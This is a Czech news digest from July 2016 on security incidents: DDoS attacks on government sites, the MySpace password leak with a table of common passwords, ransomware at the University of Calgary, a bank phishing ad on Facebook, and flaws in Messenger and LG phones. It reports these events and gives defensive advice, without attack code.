27.7.2016 Zdroj:Lupa.cz Hacking
Během včerejška se pod palbou ocitly stránky Senátu nebo policie. Dnes to vypadá na web ministerstva vnitra.
Má to být pravděpodobně odveta za schválený zákon o regulaci hazardu, který obsahuje i pasáže o možné cenzuře internetu ministerskými úředníky. Už včera rozeslali útočníci, kteří se označují za Anonymous, zprávu, že v rámci boje za svobodu internetu připravují další útoky.
Kromě stránek horní komory nejely ani stránky ČSSD nebo policie. Dnes se útok stočil pravděpodobně na stránky ministerstva vnitra, které byly od rána nedostupné.
Kontext: A je hotovo. Senát schválil regulaci hazardu včetně blokování webů
Zatímco iniciativa Přichází cenzor a Piráti se chtějí pustit běžnou cestou přes Ústavní soud, scéna odpovídá na schválení kontroverzního zákona po svém.
Stránky ministerstva vnitra jsou oblíbeným cílem a s hackerskými útoky mají zkušenosti už více než šestnáct let. Na přelomu tisíciletí se na nich vyřádila třeba slovenská skupina binary.division.
Měli jste účet na MySpace? 427 milionů hesel je na prodej za 2 800 dolarů
27.7.2016 Zdroj:Lupa.cz Sociální sítě
Rok 2016 začíná vypadat náramně, co se úniků (a vymyšlených úniků) hesel týče. Pokud je tento případ skutečný, tak je to také rekordní únik.
Stejný hacker, který prodával 164 (číslo se různí) milionů hesel z LinkedIn (viz Na prodej je 117 milionů hesel z LinkedIn, za 2 200 dolarů), v minulém týdnu nabídl na prodej 427 milionů hesel (ale jenom 360 milionů e-mailů) z MySpace. Což je jedna z prvních sociálních sítí, která by skutečně nějakých těch pár stovek milionů účtů mohla v určité době mít. Byť dnes už je to jenom pohrobek dřívější slávy.
Zajímavé na tomto dalším úniku je, že podle Hacker Tries To Sell 427 Milllion Stolen MySpace Passwords For $2,800 by mohlo jít skutečně o únik e-mailů a hesel používaných v MySpace, tedy pochopitelně opět, pokud budeme mírně ignorovat to, že e-maily a hesla lidé recyklují a Motherboardu se nepodařilo ověřit víc než několik e-mailů.
V úniku je větší množství hesel, protože k jednomu e-mailu jsou v některých případech poskytnuta hesla dvě. Vedle e-mailu, hesla/hesel obsahuje ještě uživatelské jméno. To je ale k dispozici pouze u 111 milionů záznamů. Někde primární hesla chybí a je k dispozici pouze heslo sekundární.
Kompletní únik mají k dispozici v LeakedSource.com a analýzu si můžete přečíst na jejich blogu. Uvádějí tam i to, že hesla byla uložena v šifrované SHA1 podobě, ale bez (zásadně nutného) dodání salt složky, proto je velmi lehké hesla získat (říkat SHA1 šifrování je dnes opravdu už poněkud nepatřičné). Zajímavé může být i to, že je zde 855 tisíc hesel „homelesspa“, která jsou zcela určitě výsledkem automatického generování.
TIP: Podívejte se například na SHA1 Free Online Encrypt & Decrypt, pokud si chcete zkusit, jak vypadá SHA1. A všimněte si, že v databázi už mají skoro 3 miliardy slov.
Nejpoužívanější hesla? Klasika
Když z následujícího přehledu vynecháte výše zmíněné „homelesspa“, tak nejpoužívanější hesla vlastně nejsou nijak překvapivá:
Heslo Výskyt
1 homelesspa 855,478
2 password1 585,503
3 abc123 569,825
4 123456 487,945
5 myspace1 276,915
6 123456a 244,641
7 123456789 191,016
8 a123456 165,132
9 123abc 159,700
10 (POSSIBLY INVALID) 158,462
11 qwerty1 141,110
12 passer2009 130,740
13 fuckyou1 125,302
14 iloveyou1 123,668
15 princess1 114,107
16 12345a 111,818
17 monkey1 106,424
18 football1 101,149
19 babygirl1 90,685
20 love123 88,756
21 a12345 85,874
22 iloveyou 85,001
23 jordan23 81,028
24 hello1 80,218
25 jesus1 78,075
26 bitch1 78,015
27 password 77,913
28 iloveyou2 76,970
29 michael1 75,878
30 soccer1 74,926
31 blink182 73,145
32 29rsavoy 71,551
33 123qwe 70,476
34 angel1 70,271
35 myspace 69,019
36 fuckyou2 68,995
37 jessica1 67,644
38 number1 65,976
39 baseball1 65,400
40 asshole1 63,078
41 1234567890 62,855
42 ashley1 62,611
43 anthony1 62,295
44 money1 61,639
45 asdasd5 60,810
46 123456789a 60,441
47 superman1 59,565
48 sunshine1 57,522
49 nicole1 56,039
50 password2 55,754
51 charlie1 54,432
52 shadow1 54,398
53 jordan1 54,004
54 1234567 51,131
55 50cent 50,719
LeakedSource se prozatím nepodařilo rozlousknout všechna hesla, ale pro sestavení žebříčku nejpoužívanějších to stačí, SHA1 podoba má snadno spočitatelný počet výskytů. A protože jde o velmi snadná hesla, z nichž většina už dávno má SHA1 podobu známou, tak je snadné takovýto žebříček sestavit.
Nejvíce účtů z domény Yahoo
Pohled na nejpoužívanější domény u e-mailu uvedených při založení účtů ukazuje na 126 milionů výskytů @yahoo.com. Poměrně pěkná ukázka toho, jak významné před nějakými těmi pěti a více lety bylo Yahoo v USA. Pokud byste se chtěli podívat na delší přehled, tak viz výše zmíněný blog od LeakedSource.
Doména Výskyt
1 @yahoo.com 126,053,325
2 @hotmail.com 79,747,231
3 @gmail.com 25,190,557
4 @aol.com 24,115,704
5 @aim.com 5,345,585
6 @live.com 4,728,497
7 @hotmail.co.uk 4,701,850
8 @msn.com 4,378,167
9 @myspace.com 4,257,451
10 @comcast.net 3,275,651
MySpace má dnes jen asi 50 milionů návštěvníků
Dnešní MySpace má už jenom nějakých 50 milionů návštěvníků měsíčně, ale je více než pravděpodobné, že v průběhu deseti let nasbírali stovky milionů účtů, které jsou vázané ke stále existujícím e-mailům. Samotné MySpace uvádí, že má miliardu registrovaných uživatelů.
Kdy došlo k úniku výše zmíněných e-mailů a hesel, známo není. Mohlo to být nedávno a hackeři se nemuseli dostat ke všem údajům, ale také před několika lety. Divíte se, proč se případný letitý únik snaží někdo prodat až teď? Většinou to bývá proto, že už pro data nemá žádné další využití. Už bylo vytěženo vše, co mohlo být, a s ohledem na stáří dat už nejsou kombinace e-mail+heslo dostatečně aktuální.
Jak navíc uvádí Motherboard, hacker (známý jako Peace) jim řekl, že data dal raději k prodeji, než je „idioti začnou šířit“. Nabízí je za 6 bitcoinů, tedy zhruba za 2 800 dolarů.
Co dělat, pokud jste byli uživateli MySpace?
Jako u každého úniku i zde platí, že heslo použité na daném webu musíte považovat za prozrazené, ať už v kombinaci s vaším e-mailem tam použitým, nebo dalšími e-maily, které používáte. Toto heslo byste už nikdy neměli nikde použít, pokud ho stále na MySpace máte, tak by bylo vhodné ho změnit – bez ohledu na to, zda MySpace používáte, či nikoliv.
LAW FIT 2016: Internet už nebude stejný. Jen nevíme, jaký bude
27.7.2016 Zdroj:Lupa.cz IT
Mohou přísnější evropská pravidla pro ochranu osobních údajů poškodit zdejší internetové podnikatele? Letošní ročník konference se točil kolem ochrany dat.
„Internet se změní zásadním způsobem, už nebude takový, jak ho dnes známe,“ řekl ve svém vystoupení na čtvrtém ročníku konference LAW FIT 2016 Josef Prokeš, ředitel správní sekce Úřadu pro ochranu osobních údajů (ÚOOÚ). Podstatná část setkání právníků, studentů, zástupců státní správy a internetových podnikatelů se tentokrát nesla ve stínu v dubnu schváleného nařízení Evropské unie o ochraně osobních údajů (GDPR).
TIP: Ochrání nám EU osobní údaje na internetu?
Pro celou debatu ovšem bylo příznačné, že dnes vlastně ještě nikdo není schopný odhadnout, jak konkrétně nařízení podobu internetu změní. „Neznalost nařízení je velká. Nařízení zatím studují jak úředníci, tak zástupci průmyslu,“ připustil Prokeš. První přesnější výklad jednotlivých obecných pravidel se tak podle něj od úřadů na ochranu údajů dá čekat až v průběhu podzimu. Z hlediska nařízení je času dost – v platnost totiž vstoupí až na jaře roku 2018. „Nejen trh, ale i úřad se v průběhu dvou let musí adaptovat na nový evropský předpis,“ dodala ve svém vystoupení také šéfka ÚOOÚ Ivana Janů.
Bývalá ústavní soudkyně zdůraznila, že ani v měnícím se prostředí internetu nesmíme zapomínat na „právo na informační sebeurčení“. „Právě uvedená pravidla, pokud budou férově a rozumně prosazována, mohou být srozumitelným pojítkem k uchopení srozumitelného pojmu soukromí, neodmyslitelně spjatého s právem na lidskou důstojnost, které tradičně je a musí i nadále zůstat neobchodovatelnou komoditou. Soukromí člověka v tomto století jistě prochází proměnami, rezignovat však na jeho důležitost v nárocích na jeho ochranu není možno, to je imperativ.“
Neuvážené využívání technologií podle Janů může ohrožovat vývoj společnosti a nadbytečné zásahy do soukromí mohou vést k podřízenosti společnosti technice. „Technologická totalita pro mne znamená nejen prosazování neujasněných a neodpovědných konceptů zpracování dat, ale také úplné a nedomyšlené odevzdání se technologiím a technologickým gigantům bez patřičného prostoru pro informační sebeurčení člověka nás všech,“ řekla. „Informační sebeurčení je úzce svázáno s důstojností člověka coby středobodem, ze kterého vycházejí všechna další základní práva obsažená v Listině a ve všech mezinárodních lidskoprávních dokumentech,“ dodala předsedkyně ÚOOÚ.
TIP: Máte právo být zapomenuti. Co změní reforma ochrany osobních dat?
Příliš moc ochrany škodí
Protipól ochranářského přístupu k osobním údajům nabídl na LAW FIT 2016 zástupce generálního ředitele Seznam.cz Michal Feix. Podle něj je evropská představa o nutnosti chránit občany před riziky ve srovnání se světem notně přehnaná. „Problémem Evropy myslím je, že jsme filozoficky přesvědčeni, že evropský občan je z principu středně erudovaný a kompetentní činit samostatná rozhodnutí. A proto je tu stát, který ho pohlídá, aby neudělal nějakou chybu nebo aby se mu něco zlého nestalo. Když to porovnáte s filozofií, kterou razí třeba ve Spojených státech, tak tam je mnohem větší míra odpovědnosti na individuálním občanovi.“
Přísnější evropská pravidla pro ochranu osobních údajů podle Feixe mohou poškodit zdejší internetové podnikatele. „Evropa se dnes chlubí, že má nejlepší ochranu osobních údajů na světě. A to je problém, protože to je naše zásadní konkurenční nevýhoda oproti všem ostatním na světě, kteří ta pravidla nemají stejná,“ argumentoval.
Seznam je – jako řada dalších digitálních firem – závislý na příjmech z reklamy. A ukazuje se, že reklamní model je stále pro uživatele nejpřijatelnější – jejich ochota za služby či obsah přímo platit se v praxi ukazuje jako mizivá. Proto se internetový byznys snaží peníze získávat od inzerentů. Ti ale za peníze vyžadují služby, které jim dávají smysl. Svět digitální reklamy se přitom v uplynulých letech výrazně proměnil. Od cílení odhadovaného podle obsahového zaměření serverů (například na základě předpokladu, že na server o autech chodí hlavně muži) přešel k metodám založeným na datech o chování uživatelů.
Pseudoanonymní či anonymní?
„Dříve jsme se bavili o tom, zda cílíme na muže nebo na ženy, kde asi bydlí a kolik je jim asi let, dnes se bavíme o věcech, které se nazývají třeba nákupní úmysl. Můžete také cílit na různé cílové skupiny, jako třeba ‚chystá se na dovolenou‘ a podobně,“ vysvětloval ve své přednášce Lukáš Rýdl z agentury Dobrý web. „Každý klient, který dnes investuje peníze do své digitální propagace, očekává, že se na konci dozví, co přesně mu taková investice přinesla,“ dodal. A k tomu jsou podle něj zapotřebí velká množství dat a analytické práce.
„Prakticky všechny metody cílení reklamy jsou dnes postavené na jednom podobném principu: snažíte se z chování počítače uhádnout, o jakou osobu se přibližně jedná,“ vysvětloval také Feix. Evropa se podle něj v poslední době snaží odpovědět na otázku, zda tyto tzv. pseudoanonymní údaje jsou nebo nejsou osobními daty. „My se snažíme tvrdit, že data, která v tomto směru osobu jednoznačně neidentifikují, osobními daty nejsou. Problém, na který narážíme, je, že pokud vyvinete nějaké extrémní matematické a výzkumné úsilí, tak pochopitelně existují situace, ve kterých i z těch pseudoanonymních dat jste schopní určit, o jakou osobu se jedná,“ připustil Feix.
Ano, jde zejména o známou kontroverzi kolem cookies. „Je to technologie, která je stará prakticky jako webová stránka sama. Dvacet let nikomu nevadila a na internetu dvacet let bez problémů fungovala. Posledních asi pět let je ale kolem ní ohromný rozruch. Pokud se ale detailně technicky podíváte na to, co je cookie a jaká informace se v cookie ukládá, nemůžete nikdy dospět k jinému závěru, než že se nejedná o informaci, která identifikuje člověka, ale která identifikuje webový prohlížeč,“ přesvědčoval Feix.
Připustil ale také, že někdy i rozpoznání webového prohlížeče může v důsledku vést k identifikaci konkrétního člověka. „Ale zároveň konstatuji, že v drtivé většině všech online firem po světě dnes prakticky není u reklamních systémů důležité, kdo konkrétně u toho počítače sedí. Potřebujete vědět zhruba věkové rozpětí, pohlaví, zajímají vás ideálně zájmy, koníčky, tedy poměrně obecné věci,“ dodal Feix.
Žádné zásadní změny
Pro digitální trh bude každopádně v praxi důležité hlavně to, jak bude ÚOOÚ (případně jiný regulátor) nové nařízení o ochraně osobních údajů vykládat. V tomto směru zatím moc jasno není.
Podle Josefa Prokeše se ovšem mění celkový rámec ochrany osobních dat. „Každý hráč, který se dosud o žádnou ochranu dat nestaral, se s tím teď musí nějak vypořádat,“ řekl. Pokud se ale tuzemské firmy už ochranou dat zabývaly, neměly by pro ně změny být až tak velké. „Z hlediska hmotně-právního se o žádné zásadní změny nejedná. Pokud si vezmete starší stanoviska úřadu, zjistíte, že se tyto věci objevují ve velmi podobném tvaru,“ dodal Prokeš.
Na konkrétní výklad nařízení si ale budeme muset ještě počkat. Institut pro digitální ekonomiku, který byl partnerem konference, zatím shrnul hlavní prvky ve svém materiálu (PDF).
Vyděračský virus zablokoval stovku počítačů. Univerzita zaplatila výkupné půl miliónu
27.7.2016 Viry
Velkou čáru přes rozpočet udělali počítačoví piráti kanadské univerzitě v Calgary. Kyberzločincům se totiž podařilo nakazit více než stovku tamních PC vyděračským virem a za jejich zpřístupnění požadovali bezmála půlmiliónové výkupné. To vedení univerzity nakonec skutečně zaplatilo, upozornil server Vyděračský virus z rodiny ransomware infikoval podstatnou část univerzitního počítačového systému. Kromě desítek počítačů také některé servery, na kterých univerzita provozovala vlastní e-mailový systém.
V univerzitní síti si nezvaný návštěvník počínal úplně stejně, jako když útočí na počítače běžných uživatelů. Ne pevných discích tedy zašifroval data, přičemž za jejich opětovné zpřístupnění požadovali počítačoví piráti výkupné.
Zaplatit chtěli v bitcoinech
Nebyli přitom žádní troškaři. Za dešifrovací klíč chtěli zaplatit 40 bitcoinů, tedy v přepočtu více než 480 000 korun. Tuto virtuální měnu nezvolili kyberzločinci náhodou. Její pohyb se nedá vystopovat, a tak je prakticky nulová šance, že by mohli být vypátráni.
S ohledem na to, že byla zcela paralyzovaná e-mailová komunikace a že se univerzitní administrátoři nemohli dostat do jednotlivých PC, kde byla uložená důležitá data, rozhodlo se vedení univerzity požadavku hackerů vyhovět. Výkupné zaplatili.
Ve snaze o zachování všech důležitých systémů univerzita výkupné zaplatila.
Linda Dalgettyová z univerzity v Calgary
To přitom bezpečnostní experti několik posledních měsíců důrazně nedoporučují. Ani po zaplacení výkupného se totiž uživatelé ke svým datům nemusí dostat. Místo placení výkupného je nutné virus z počítače odinstalovat, k nezálohovaným datům se ale lidé zpravidla již nedostanou.
„Ve snaze o zachování všech důležitých systémů a vyřešení problémů univerzita výkupné týkající se útoku ransomwaru zaplatila,“ potvrdila Linda Dalgettyová, která na univerzitě v Calgary vede finanční oddělení. Žádné další podrobnosti však neprozradila.
Podle serveru The Hacker News nicméně již administrátoři dešifrovací klíč získali. V současnosti se s jeho pomocí již snaží obnovit zašifrovaná data a virus odstranit. Zda se jim to skutečně povede, však zatím není jasné.
V prohlášení zástupci univerzity pouze doplnili, že žádná osobní data studentů nebyla zneužita. Vedení školy prý spolupracuje s tamní policií a bude se snažit útočníky dopátrat.
Vyděračské viry se šíří jako lavina
Jak je z řádků výše patrné, kyberzločincům se nasazování vyděračských virů jednoznačně vyplácí. To je patrně jeden z hlavních důvodů, proč se po síti šíří doslova jako lavina. Na přelomu března a dubna dokonce bezpečnostní experti bili na poplach s tím, že škodlivých kódů požadujících výkupné dramaticky přibylo.
Ostražití by před vyděračskými viry neměli být pouze majitelé klasických počítačů. Loni v červnu bezpečnostní experti odhalili nezvaného návštěvníka, který požadoval výkupné i na mobilním telefonu.
Jak se bránit proti vyděračským virům?
Neotvírejte přílohy e-mailových zpráv od neznámých a podezřelých adresátů.
Pravidelně zálohujte svoje data. V případě nákazy se počítač jednoduše přeinstaluje a zašifrovaná data se mohou obnovit i bez placení výkupného nebo nutnosti je odšifrovat.
Externí disky nebo jiné úložné systémy, na které jsou data zálohována, by neměly být neustále připojeny k počítači. Minimalizuje se tím riziko, že se vyděračský virus zabydlí i u zálohovaných dat.
Pravidelně aktualizujte operační systém i jiné programy. Znesnadníte tak práci počítačových pirátů, kteří se snaží objevené trhliny zneužít k propašování škodlivých kódů.
Nutné je také pravidelně aktualizovat antivirový program, případně jiné bezpečnostní aplikace.
Nepoužívejte programy, pro které již výrobce ukončil podporu. Hrozba nákazy například na Windows XP je mnohonásobně vyšší než u novějších verzí tohoto operačního systému.
Podvodníci oprášili starý trik, na Facebooku lákají na bonus 1000 Kč
27.7.2016 Podvod
Za zaměstnance České spořitelny se opět vydávají podvodníci na sociální síti Facebook. Lákají na novou verzi internetového bankovnictví Servis24, za vyzkoušení přitom nabízejí 1000 Kč. Ve skutečnosti se pouze snaží od důvěřivců vylákat přihlašovací údaje.
Prakticky nachlup stejný trik zkoušeli počítačoví piráti už letos v dubnu. Tehdy si kvůli tomu na Facebooku dokonce zřídili celý falešný profil.
Nově to zkouší pomocí reklamy, která se na zmiňované sociální síti objevuje. „Přejděte na novou verzi internetového bankovnictví a získejte bonus 1000 Kč! Bezpečnější bankovnictví s přehlednějším rozvržením pro jednoduchou správu vašich financí,“ stojí v lákavě vyhlížející nabídce.
Obejít dokážou i potvrzovací SMS zprávy
Reklamu doplňuje odkaz, který samozřejmě směřuje na podvodné stránky, jejichž prostřednictvím se snaží kyberzločinci vylákat od důvěřivců přihlašovací údaje k internetovému bankovnictví. Vyplněním přihlašovacích údajů na podvodných stránkách se přitom lidé vystavují velkému riziku.
Počítačoví piráti jsou totiž už jen kousek od toho, aby jim mohli vybílit účet – stačí, aby propašovali virus na jejich chytrý telefon. Prostřednictvím něj pak budou schopni odchytávat potvrzovací SMS zprávy pro platby, jako tomu bylo už v minulosti.
Ukázka jedné z podvodných SMS zpráv, jejímž prostřednictvím se dokážou podvodníci dostat do chytrého telefonu.
Podvodné webové stránky servis25.ic.cz, kam reklama na Facebooku směřovala, jsou v současnosti již nefunkční. Kyberzločinci ale mohou jednoduše odkaz v reklamě změnit a zkoušet nachytat další lidi.
Zástupci České spořitelny před podobnými podvody varovali již dříve. „Důrazně varujeme před jakoukoli reakcí na podobné výzvy. V žádném případě neklikejte na nabízený odkaz a svoje údaje nevyplňujte nikam jinam než na oficiální stránky www.servis24.cz. Podvodníci by se pak jejich prostřednictvím mohli dostat k Vašim penězům,“ uvedli zástupci banky.
„V případě jakýchkoliv pochybností nás kontaktujte na bezplatném telefonním čísle 800 207 207,“ doplnili zástupci banky.
Obezřetní by v případě podobných nabídek měli být také uživatelé jiných bankovních institucí. Není totiž vyloučeno, že stejný trik budou počítačoví piráti zkoušet příště pod hlavičkou úplně jiné společnosti.
Šéf Facebooku hackerům usnadnil práci, na sociálních sítích používal primitivní heslo
27.7.2016 Hacking
Prakticky všechna světová média v pondělí obletěla zpráva o tom, že účty na sociálních sítích šéfa Facebooku Marka Zuckerberga napadli hackeři. Ten ale počítačovým pirátům práci značně usnadnil, protože používal všude jedno stejné heslo. Jak upozornila britská stanice Sky News, bylo navíc velmi primitivní.
Bezpečnostní experti neustále kladou lidem na srdce, jak důležité je používat sofistikovaná hesla k ochraně svých on-line účtů. Jsou totiž zpravidla první linií účinné ochrany před odcizením citlivých osobních dat, například pro on-line bankovnictví nebo platby na internetu.
Je proto až s podivem, že tvůrce jedné z největších sociálních sítí na světě si tuto radu nevzal k srdci. Twitter, LinkedIn, Instagram a také Pinrest si totiž Zuckerberg chránil pomocí primitivního hesla „dadada“.
Jednoduše heslo vyzkoušeli
Na obranu šéfa Facebooku se sluší připomenout, že šlo o účty, které příliš nepoužíval. I přesto ale hackeři ze skupiny OurMine tento úlovek považovali za velmi cennou trofej, se kterou se prakticky okamžitě pochlubili na mikroblogovací síti Twitter.
Účet hackerů ze skupiny OurMine na sociální síti Twitter.
Hackeři ze skupiny OurMine se pochlubili s cenným úlovkem na Twiteru. Jejich účet byl krátce poté zablokován.
Hackeři Zuckerbergovo heslo získali podle Sky News z ukradené databáze obsahující na 167 miliónů hesel k sociální síti LinkedIn. Ta se nabízela už od minulého měsíce k prodeji na černém internetovém trhu.
V ní si jednoduše našli přihlašovací údaje šéfa Facebooku a vyzkoušeli je i na dalších účtech na internetu. To jinými slovy znamená, že dostat se na jeho účty na sociálních sítích by zvládli i v případě, kdyby používal sofistikovanější heslo.
Potvrdily se tak slova bezpečnostních expertů o tom, že uniklá databáze může představovat riziko i přesto, že k samotnému útoku na LinkedIn došlo již v roce 2012. Počítačovým pirátům se podařilo přihlašovací údaje zneužít i čtyři roky poté.
Pozor na jednoduchá hesla
Tento případ jasně ukazuje na to, jak zranitelná mohou hesla a pochopitelně také samotné uživatelské účty na síti být. Vhodné je proto nejen vymýšlet sofistikovaná hesla pro každý účet zvlášť, ale alespoň jednou za pár měsíců je pravidelně měnit.
Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo) nebo pouhou posloupností číslic.
Počítačoví piráti mohli na Facebooku měnit i mazat zprávy
27.7.2016 Podvod
Velké nepříjemnosti mohli způsobit počítačoví piráti uživatelům Facebooku. Na této sociální síti totiž byla chyba, kterou mohli kyberzločinci zneužít k mazání nebo ke změnám zpráv, jež si uživatelé posílají mezi sebou. Upozornili na to bezpečnostní experti ze společnosti Check Point.
Chyba se týkala on-line chatu i oficiální mobilní aplikace Messenger, kterou Facebook svým uživatelům nabízí. „Zranitelnost umožňovala upravit nebo odstranit jakoukoli odeslanou zprávu, fotografii, soubor, odkaz a mnoho dalšího,“ prohlásil David Řeháček, bezpečnostní odborník ze společnosti Check Point.
Podle něj kyberzločinci mohli zranitelnost zneužít k manipulaci s historií zpráv v rámci podvodných kampaní. „Útočník mohl změnit historii konverzace, a získat tak zfalšovanou dohodu s obětí nebo jednoduše změnit podmínky dohody,“ konstatoval Řeháček.
Kyberzločinci mohli šířit viry
Chyba mohla být samozřejmě zneužita také k distribuci škodlivých kódů. „Útočník mohl změnit legitimní odkaz nebo soubor na škodlivý a snadno přesvědčit uživatele ke kliknutí a otevření,“ podotkl Řeháček.
Měnit zprávy v chatu přitom standardně nemohou ani samotní uživatelé. Bezpečnostní experti proto zástupce sociální sítě o nově objevené chybě okamžitě informovali, díky čemuž mohla být prakticky okamžitě opravena.
Zda se kyberzločincům podařilo chybu zneužít ještě předtím, není zatím jasné.
Nový virus dokáže řídit internetový provoz. Zobrazuje reklamu a podvodné weby
27.7.2016 Viry
Bezpečnostní experti antivirové společnosti Eset varovali před novým virem zvaným DNS Unlocker, který na napadeném počítači dokáže v podstatě řídit internetový provoz a uživatele nasměrovat na podvodné webové stránky. Zároveň je obtěžuje nadměrným zobrazováním reklamy.
DNS servery jsou ve světě jedniček a nul velmi důležité, protože standardně překládají webové adresy na číselné adresy fyzických počítačů (IP adresy). Právě tyto záznamy dokáže ale nový nezvaný návštěvník měnit.
V praxi to znamená, že hackeři mohou s jeho pomocí přesměrovat uživatele na podvodné internetové stránky. Ve chvíli, kdy uživatel na infikovaném PC zadá do internetového prohlížeče například adresu www.yahoo.com, mohou jej kyberzločinci přesměrovat na jiné stránky.
Ty zpravidla vypadají skutečně jako web Yahoo, ale obsahují daleko více reklamy, za kterou inkasují peníze právě hackeři. A to aniž by uživatel cokoliv postřehl.
Nová hrozba je zákeřnější
DNS Unlocker je však ještě zákeřnější, protože zobrazuje i vyskakující okna na podvodné webové stránky. „DNS útoky nejsou tak destruktivní a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ konstatoval Petr Šnajdr, bezpečnostní expert společnosti Eset.
Podle něj je hlavní problém v tom, jak operační systém Windows pracuje s DNS adresami. „V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS,“ doplnil Šnajdr.
Pozor na administrátorská práva
Bezpečnostní experti se proto s nalezenou nákazou obrátili přímo na společnost Microsoft, respektive na bezpečnostní divizi Microsoft Security Response Center (MSRC), která má na starosti nově objevené zranitelnosti. Ta sice uznala, že jde o chybu, ale neklasifikovala ji jako vážnou, protože k útoku jsou zapotřebí administrátorská práva.
To jinými slovy znamená, že riziku se vystavují pouze ti uživatelé, kteří surfují na internetu s administrátorskými právy. V současnosti jde ale bohužel o běžnou praxi.
Z bezpečnostního hlediska je daleko vhodnější používat počítač k rutinním úkonům pouze z účtu běžného uživatele, nikoliv administrátora. Samozřejmostí by mělo být také používání aktualizovaného antivirového programu, který si bude schopný s podobnými hrozbami poradit.
Děsivé je tiché luxování dat, varuje kybernetický expert
27.7.2016 Zabezpečení
Světové mocnosti více než kdy předtím pomocí počítačových sítí šmírují data o vládních institucích, energetice, továrnách i komunikačních systémech. Občas chaos řízený na dálku někde lokálně vyzkoušejí. Je to zlatá éra pro hackery. Firmy s vládami se o ně přetahují. Chybějí však tisíce specialistů, kterým by se dalo věřit.
Vyplývá to z rozhovoru Práva s předním expertem na počítačovou kriminalitu, 58letým Alešem Špidlou. Je otcem národní kybernetické bezpečnostní strategie, pracoval na ministerstvu vnitra a dnes působí v řízení rizik u českého zastoupení globální poradenské společnosti PricewaterhouseCoopers (PwC)
Podle něj je až děsivé, s jakou intenzitou se dnes tiše sbírají data o citlivé infrastruktuře.
„Pořádkumilovní Němci nedávno našli v informačních systémech jaderné elektrárny dva viry, které tam podle všeho nenápadně šmírovaly několik let. Jeden z těch virů byl nejaktivnější v roce 2008 a v elektrárně ho našli až nyní. Komu posílal informace a jaké? Jediné, co se ví, je, že aktivně odesílal informace. Někam,“ popisuje Špidla.
Stále častější jsou i útoky na systémy, které řídí nejrůznější technologie v průmyslu. „Před časem hackeři napadli v Německu systémy pro řízení vysoké pece. Stala se neřiditelná a musela být odstavena,“ poukazuje Špidla na další případ.
Kybernetický útok může snadno rozkolísat společnost, znevěrohodnit vládní instituce. „Stačí na několik týdnů zablokovat systém pro výplatu sociálních dávek. Nejcitlivější je ovšem energetika, plynovody, vodárenství, informační systémy. Do kritické infrastruktury se nejspíše brzy zahrnou zdravotnická zařízení. Budou muset přijímat nová bezpečnostní opatření,“ řekl Špidla.
Na nemocnice s milióny citlivých údajů si brousí zuby i organizovaný zločin. „Nedávno hackeři zablokovali databázi pacientů v nemocnici v USA. Chtěli výpalné a nemocnice ho zaplatila,“ připomíná americký právník a partner české PwC Legal Michael Mullen.
Semeništěm hackerů ovšem podle Špidly i Mullena bývají státy sponzorované skupiny.
„V Číně je jedna celá vojenská divize, která se věnuje kybernetickému boji, špionáži. I s podpůrnými jednotkami, ať už oficiálními nebo neoficiálními, se jedná asi o padesát tisíc lidí. O Rusku se říká, že jen někde ve Voroněži sedí kolem dvanácti tisíc odborníků, kteří provádějí hackerské aktivity pro stát. Stopy závažných událostí, jako jsou kybernetické útoky v Gruzii a Estonsku, vedou do Ruska,“ shrnuje Špidla. Na hackerských fórech si podle něj bez ruštiny skoro neškrtnete.
Izraelci pomáhají vycvičit Čechy
Hackeři přesměrovali například tok plynu v plynovodu z Ázerbájdžánu tak, aby šel přes Rusko. Čtrnáct dní trvalo, než se to podařilo vrátit zpátky.
„Než začne opravdová válka, je výhodné vyvolat chaos. Několik týdnů před konfliktem v Gruzii měl prezident totálně zmatené webové stránky, selhávaly informační a komunikační systémy státní správy. Do takovéhoto chaosu není těžké vjet s tanky,“ vysvětluje Špidla.
Potíž při hledání lidí na kyberochranu státu je loajalita. „Dobré to mají v Izraeli, kde se lidé znají z armády a nemají problém v případě potřeby pracovat pro oficiální struktury. Je velmi dobře, že Česko uzavřelo s Izraelem smlouvu o sdílení informací, týkající se kybernetické bezpečnosti. Jsou vycvičeni neustálým bojem,“ tvrdí Špidla.
Izraelci se podle něj podíleli na vzniku kybernetického výcvikového centra CyberGym v Řitce u Prahy. Zde se cvičí policisté v nedávno ustanoveném týmu proti kybernetické kriminalitě.
„Naše policie disponuje kvalitními odborníky, ale je jich málo. Je problém sehnat počítačové specialisty do těchto složek. Soukromá sféra tyto specialisty platí úplně jinak. Odborníků na počítačovou bezpečnost je ale celosvětově málo. Například FBI má na to speciální program: hackerům předkládá velmi zajímavé nabídky, aby je přemluvil ke spolupráci,“ uvedl Špidla.
Mobily od LG mají nebezpečné trhliny. Útočníci mohou měnit SMS zprávy
27.7.2016 Mobilní
Dvě nebezpečné trhliny byly odhaleny v chytrých telefonech od společnosti LG. Útočníci je mohli zneužít k tomu, aby měnili znění doručených SMS zpráv, nebo na dálku převzali kontrolu nad napadeným přístrojem. Na zranitelnosti upozornili bezpečnostní analytici ze společnosti Check Point.
Jak bránit PC a mobily proti hackerům?
Počítačoví piráti neustále hledají nové cesty, jak se lidem dostat do počítače. Propašovat škodlivé kódy se přitom stále častěji snaží také do mobilů a tabletů.
Do mobilních zařízení se snaží kyberzločinci dostat prakticky stejným způsobem jako do klasických počítačů. Hledají chyby v nejrůznějších aplikacích a operačních systémech, které by jim dovolily propašovat záškodníka na cizí přístroj.
Hackeři také spoléhají na to, že uživatelé rizika podceňují. Na klasických počítačích provozuje antivirový program prakticky každý, u mobilů a tabletů tomu tak ale není. Počítačovým pirátům tak nic nestojí v cestě.
pondělí 6. června 2016, 12:02
Chyby se týkají výhradně telefonů od LG s operačním systémem Android. Patrně jsou tedy obsaženy v nějakém doplňkovém softwaru, který tento výrobce do svých přístrojů instaluje.
„První zranitelnost umožňuje škodlivé aplikaci nainstalované na LG zařízení zneužít přístup k oprávněním, zvýšit práva útočníků a získat větší kontrolu nad zařízením,“ varoval David Řeháček, bezpečnostní odborník ze společnosti Check Point.
